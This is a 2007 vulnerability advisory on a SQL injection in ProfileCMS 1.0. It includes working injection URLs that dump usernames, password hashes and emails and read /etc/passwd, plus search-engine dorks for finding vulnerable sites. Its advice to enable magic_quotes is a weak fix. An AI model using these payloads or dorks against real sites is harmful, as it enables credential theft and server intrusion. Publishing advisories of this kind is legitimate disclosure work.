ECHO_ADV_84$2007=0D
=0D
-----------------------------------------------------------------------------------------=0D
[ECHO_ADV_84$2007] ProfileCMS <= 1.0 Remote SQL Injection Vulnerability=0D
-----------------------------------------------------------------------------------------=0D
=0D
Author         : M.Hasran Addahroni=0D
Date           : November, 17 th 2007=0D
Location       : Australia, Sydney=0D
Web : http://advisories.echo.or.id/adv/adv84-K-159-2007.txt=0D 
Critical Lvl   : Dangerous=0D
Impact	       : System access=0D
Where	       : From Remote=0D
---------------------------------------------------------------------------=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Application   : ProfileCMS  =0D
version       : <= 1.0=0D
Vendor : http://profilecms.com/=0D 
Description :=0D
=0D
ProfileCMS is a powerful Content Management System for Social Networking profile codes and widgets. There are no other scripts that offer the freedom, features and practicality of ProfileCMS, we have constructed a easy to use, accessable platform for both webmasters and front end users. Based on the popular MSCMS system which has been the Number 1 Myspace Content Management System for almost 1 year now, ProfileCMS allows webmasters to take advantage of the ever growing popularity of social netowrking sites and offer users codes and widgets from ANY social network.=0D
=0D
---------------------------------------------------------------------------=0D
=0D
Vulnerability:=0D
~~~~~~~~~~~~~=0D
=0D
Input passed to the "id" parameter in profiles-codes, video-codes, and arcade-games modules is not properly verified before being used to sql query. =0D
This can be exploited thru the browser and get the hash md5 password from users.=0D
Successful exploitation requires that "magic_quotes" is off.=0D
=0D
=0D
Poc/Exploit:=0D
~~~~~~~~~=0D
=0D
http://target.com/index.php?app=profile-codes&action=codes&id=-1%20union%20select%201,2,concat(id,0x3a,username,0x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20users/*=0D 
http://target.org/index.php?app=video-codes&action=videos&id=-1%20union%20select%201,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6%20from%20users/*=0D 
http://target.net/index.php?app=arcade-games&action=games&id=-1%20union%20select%201,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6%20from%20users/*=0D 
http://target.net/index.php?app=arcade-games&action=games&id=-1%20union%20select%201,load_file(0x2f6574632f706173737764),3,4,5,6%20from%20users/*=0D 
=0D
Dork:=0D
~~~~=0D
Google        : "Powered By ProfileCMS v1.0" or "Total Generators & Widgets"=0D
Altavista.com : "Total Generators & Widgets"=0D
=0D
=0D
Solution:=0D
~~~~~~=0D
=0D
- Edit the source code to ensure that input is properly verified.=0D
- Turn on magic_quotes in php.ini=0D
 =0D
=0D
Timeline:=0D
~~~~~~~~=0D
=0D
- 15 -11 - 2007 bug found=0D
- 15 -11 - 2007 vendor contacted=0D
- 17 -11 - 2007 publish advisory=0D
---------------------------------------------------------------------------=0D
=0D
Shoutz:=0D
~~~~=0D
~ ping - my dearest wife, 'zizou' zautha - my lovely son, for all the luv, the tears n the breath=0D
~ y3dips,the_day,m0by,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v, az01,negative,the_hydra, str0ke=0D
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw=0D
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry,ketut,x16=0D
~ newbie_hacker@yahoogroups.com=0D 
~ #aikmel #e-c-h-o @irc.dal.net=0D 
=0D
---------------------------------------------------------------------------=0D
Contact:=0D
~~~~~=0D
=0D
     K-159 || echo|staff || eufrato[at]gmail[dot]com=0D
Homepage: http://k-159.echo.or.id/=0D 
=0D
-------------------------------- [ EOF ] ----------------------------------=0D